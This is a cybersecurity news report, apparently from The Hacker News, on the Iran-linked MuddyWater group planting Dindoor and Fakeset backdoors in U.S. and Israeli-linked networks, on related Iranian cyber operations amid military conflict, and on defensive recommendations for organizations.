Iran-Linked MuddyWater Hackers Embed New Dindoor Backdoor in U.S. Networks
New research from Broadcom’s Symantec and Carbon Black Threat Hunter Team has revealed that an Iranian hacking group has infiltrated the networks of several U.S. companies, including banks, airports, non-profits, and the Israeli division of a software firm. This activity has been linked to the state-sponsored group known as MuddyWater (also referred to as Seedworm), which is associated with the Iranian Ministry of Intelligence and Security (MOIS). The campaign reportedly began in early February, with heightened activity noted following recent U.S. and Israeli military strikes on Iran.
Targeted Organizations and Backdoor Discovery
The software company targeted in this campaign serves various sectors, including defense and aerospace, with its Israeli operations appearing to be the primary focus. The attacks have led to the introduction of a previously unknown backdoor called Dindoor, which utilizes the Deno JavaScript runtime for execution. Broadcom has also reported an attempt to exfiltrate data from the software company using the Rclone utility directed toward a Wasabi cloud storage bucket, although it remains unclear if this effort was successful.
In addition to the software company, a U.S. bank and a Canadian non-profit were also targeted. Investigations revealed a separate Python backdoor named Fakeset within the networks of a U.S. airport and the non-profit organization. This backdoor was downloaded from servers belonging to Backblaze, a U.S.-based cloud storage provider. The digital certificate used to sign Fakeset has also been linked to other malware, including Stagecomp and Darkcomp, both previously associated with MuddyWater.
Evolving Threat Landscape
The findings highlight the increasing sophistication of Iranian threat actors, who have refined their tools and malware capabilities. Reports indicate that these actors have also demonstrated advanced social engineering techniques, including spear-phishing campaigns and “honeytrap” operations designed to cultivate relationships with targets to gain access to sensitive information.
This surge in cyber activity coincides with escalating military tensions in the region, prompting a wave of cyber attacks in the digital domain. Recent research from Check Point has identified the pro-Palestinian hacktivist group Handala Hack (also known as Void Manticore) conducting operations through Starlink IP ranges to exploit vulnerabilities in externally facing applications.
Broader Cyber Threats from Iran
In recent months, various Iranian-affiliated adversaries, including Agrius (also known as Agonizing Serpens, Marshtreader, and Pink Sandstorm), have been observed scanning for vulnerabilities in Hikvision cameras and video intercom systems. These efforts exploit known security flaws such as CVE-2017-7921 and CVE-2023-6895. The targeting of IP cameras has intensified in the wake of ongoing conflicts, particularly in Israel and Gulf nations, including the UAE, Qatar, Bahrain, and Kuwait.
Check Point’s analysis indicates that Iranian cyber operations may leverage compromised cameras for operational support and battle damage assessment related to missile operations. Tracking such activities could serve as an early warning for potential kinetic actions.
The ongoing conflict has prompted advisories from the Canadian Centre for Cyber Security (CCCS), warning that Iran is likely to utilize its cyber capabilities to conduct retaliatory attacks against critical infrastructure and information operations to further its strategic interests.
Recent Developments in Cyber Operations
Several significant developments have emerged in the context of Iranian cyber activities:
- Israeli intelligence agencies reportedly infiltrated Tehran’s traffic camera network to monitor the movements of key Iranian officials, including bodyguards of Ayatollah Ali Khamenei.
- The Islamic Revolutionary Guard Corps (IRGC) has targeted Amazon’s data center in Bahrain, citing the company’s support for “enemy military and intelligence activities.”
- Active wiper campaigns are reportedly underway against Israeli sectors, including energy, finance, government, and utilities. Iran’s arsenal includes over 15 families of wiper malware, such as ZeroCleare and Meteor.
- State-sponsored groups like MuddyWater, Charming Kitten, OilRig, Elfin, and Fox Kitten have shown signs of activation and rapid retooling, preparing for retaliatory operations amid the escalating conflict.
- A large-scale cyber campaign, dubbed #OpIsrael, has been launched by pro-Russian and pro-Iranian actors targeting Israeli industrial control systems and government portals across Kuwait, Jordan, and Bahrain.
Recommendations for Organizations
Organizations are advised to enhance their cybersecurity measures in light of these developments. Recommendations include strengthening monitoring capabilities, limiting internet exposure, disabling remote access to operational technology systems, enforcing phishing-resistant multi-factor authentication, implementing network segmentation, and ensuring that all internet-facing applications and devices are up-to-date.
As the conflict continues, organizations should remain vigilant for potential cyber responses that may escalate beyond hacktivism into destructive operations.
For further details, see the full report on the evolving cyber threat landscape. As reported by thehackernews.com.
